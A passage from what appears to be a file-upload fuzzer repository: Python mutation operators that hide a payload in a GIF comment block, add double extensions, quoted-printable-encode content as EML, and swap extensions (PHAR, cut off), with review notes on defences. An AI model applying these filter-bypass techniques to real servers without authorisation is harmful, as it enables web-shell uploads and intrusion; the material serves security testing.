    __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
__resource__ = {} # ({type:resource filename})
__seed_dependency__ = __exclusion_op__.keys()#["html","php"] # seed file dependency for operation

def operation(self, output, seed_file, resource_file=None):
    """Embed the current payload in a GIF comment extension of ./resource/test.gif.

    ``output`` is mutated in place; nothing is returned.

    * ``output['content']`` becomes the bytes of ``./resource/test.gif`` with a
      comment extension (introducer ``0x21 0xFE``) inserted at byte offset
      0x30d.
    * ``output['filename']`` becomes the existing name (or, when that is
      None/empty, the name derived from ``seed_file``) with ``_M2GIF``
      appended.

    ``resource_file`` is accepted but not read; the resource path is
    hard-coded.

    Review note (defence): the resource file's header is left untouched and
    the payload sits in a comment block, so a check that looks only at the
    signature does not see it.  Re-encoding uploaded images, or stripping
    comment extensions, removes it.
    """
    payload = output['content']
    if len(payload) < 256:
        # Short payload: a single sub-block (length byte + data) followed by a
        # zero byte.
        commentBlock = [b'\x21\xFE', struct.pack('>B', len(payload)), payload, '\x00']
    else:
        # Long payload: the first sub-block is a full 255 bytes.  For each
        # later sub-block the next payload byte itself is emitted as the
        # length byte, so the payload bytes stay contiguous in the file.
        commentBlock = [b'\x21\xFE', b'\xff', payload[:0xff]]
        offset = 0xff
        while len(payload[offset:]) > 0:
            semilen = ord(payload[offset])
            commentBlock.append(struct.pack('>B', semilen))
            remaining = len(payload[offset+1:])
            pad = ""
            if semilen > remaining:
                # Final sub-block is shorter than its length byte claims:
                # fill the gap with newlines.
                pad += "\x0a" * (semilen - remaining)
            commentBlock.append(payload[offset+1:offset+1+semilen] + pad)
            offset = offset + 1 + semilen - len(pad)
        # NOTE(review): unlike the short branch, no trailing zero byte is
        # appended here.

    with open('./resource/test.gif','rb') as fp:
        data = fp.read()

    # 0x30d == 13 + 768; presumably just past the header and a 256-entry
    # global colour table of test.gif - TODO confirm against the resource file.
    output['content'] = data[:0x30d] + b''.join(commentBlock) + data[0x30d:]

    # NOTE(review): this file imports only struct; utils is presumably made
    # available by `from mutation_op import *` - confirm.
    current_name = output['filename']
    if current_name != None and len(current_name) > 0:
        base = current_name
    else:
        base = utils.extract_filename(seed_file)
    output['filename'] = base + '_M2GIF'

--------------------------------------------------------------------------------
/mutation_op/m12_xht.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation12: Double extension"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP',
'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}#['M12_JPG', 'M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
9 | __resource__ = {} # ({type:resource filename}) 10 | __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation 11 | 12 | def operation(self, output, seed_file, resource_file=None): 13 | if output['filename'] != None and len(output['filename']) > 0: 14 | filename = output['filename'] 15 | else: 16 | filename = utils.extract_filename(seed_file) 17 | 18 | output['filename'] = filename + '_M12XHT' 19 | 20 | output['fileext'] = 'xht.'+output['fileext'] 21 | -------------------------------------------------------------------------------- /mutation_op/m12_xla.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation12: Double extension" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 
'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}#['M12_JPG', 'M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 9 | __resource__ = {} # ({type:resource filename}) 10 | __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation 11 | 12 | def operation(self, output, seed_file, resource_file=None): 13 | if output['filename'] != None and len(output['filename']) > 0: 14 | filename = output['filename'] 15 | else: 16 | filename = utils.extract_filename(seed_file) 17 | 18 | output['filename'] = filename + '_M12XLA' 19 | 20 | output['fileext'] = 'xla.'+output['fileext'] 21 | -------------------------------------------------------------------------------- /mutation_op/m12_gzip.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation12: Double extension" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 
'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}# ['M12_JPG', 'M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
9 | __resource__ = {} # ({type:resource filename}) 10 | __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation 11 | 12 | def operation(self, output, seed_file, resource_file=None): 13 | if output['filename'] != None and len(output['filename']) > 0: 14 | filename = output['filename'] 15 | else: 16 | filename = utils.extract_filename(seed_file) 17 | 18 | output['filename'] = filename + '_M12GZIP' 19 | 20 | output['fileext'] = 'gzip.'+output['fileext'] 21 | -------------------------------------------------------------------------------- /mutation_op/m12_m4v.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation12: Double extension" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 
'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}# ['M12_JPG', 'M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 9 | __resource__ = {} # ({type:resource filename}) 10 | __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation 11 | 12 | def operation(self, output, seed_file, resource_file=None): 13 | if output['filename'] != None and len(output['filename']) > 0: 14 | filename = output['filename'] 15 | else: 16 | filename = utils.extract_filename(seed_file) 17 | 18 | output['filename'] = filename + '_M12M4V' 19 | 20 | output['fileext'] = 'm4v.'+output['fileext'] 21 | -------------------------------------------------------------------------------- /mutation_op/m12_pages.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation12: Double extension" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 
'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}#['M12_JPG', 'M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
9 | __resource__ = {} # ({type:resource filename}) 10 | __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation 11 | 12 | def operation(self, output, seed_file, resource_file=None): 13 | if output['filename'] != None and len(output['filename']) > 0: 14 | filename = output['filename'] 15 | else: 16 | filename = utils.extract_filename(seed_file) 17 | 18 | output['filename'] = filename + '_M12PAGES' 19 | 20 | output['fileext'] = 'pages.'+output['fileext'] 21 | -------------------------------------------------------------------------------- /mutation_op/m06.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation 6: Apply form EML" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | 8 | # XXX: Fill the exclusion operator and seed dependency 9 | __exclusion_op__ = {'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP', 'M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06' ,'M07', 'M08', 'M09', 'M10'], 'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 
'M04_ZIPX', 'M06' ,'M07', 'M08', 'M09', 'M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M08','M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M07_OTHER', 'M10', 'M04_PHP5'] # ([classname])when this op used for mutation,
# operations in this list can be used to extra mutation.
__resource__ = {""} # ({type:resource filename})
__seed_dependency__ = __exclusion_op__.keys()#['html'] # seed file dependency for operation

def operation(self, output, seed_file, resource_file=None):
    """Wrap the current payload in an e-mail style document with an encoded body.

    ``output`` is mutated in place; nothing is returned.

    * ``output['content']`` becomes a fixed header (a ``TESTEML`` line,
      ``Content-Type: text/html``, ``Content-Transfer-Encoding:
      quoted-printable``, blank line) followed by the previous content.  In
      that content every character other than ASCII letters, digits, space,
      newline and tab is written as ``=`` plus the lowercase hex of its code
      point, without zero padding.
    * ``output['filename']`` becomes the existing name (or, when that is
      None/empty, the name derived from ``seed_file``) with ``_M6`` appended.
    * ``output['fileext']`` is overwritten with ``'eml'``.

    ``resource_file`` is accepted but not used.

    Review note (defence): after this step markup characters such as ``<``
    appear only in encoded form (``=3c``), so content inspection of uploaded
    .eml files has to decode the body before matching on markup.
    """
    header = '''TESTEML
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

'''
    passthrough = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890 \n\t'
    # Characters in `passthrough` are copied as-is; everything else is escaped.
    encoded = ''.join(
        ch if ch in passthrough else '=' + hex(ord(ch))[2:]
        for ch in output['content']
    )
    output['content'] = header + encoded

    current_name = output['filename']
    if current_name != None and len(current_name) > 0:
        base = current_name
    else:
        base = utils.extract_filename(seed_file)
    output['filename'] = base + '_M6'
    output['fileext'] = 'eml'

--------------------------------------------------------------------------------
/mutation_op/m04_phar.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC',
'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}# ['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
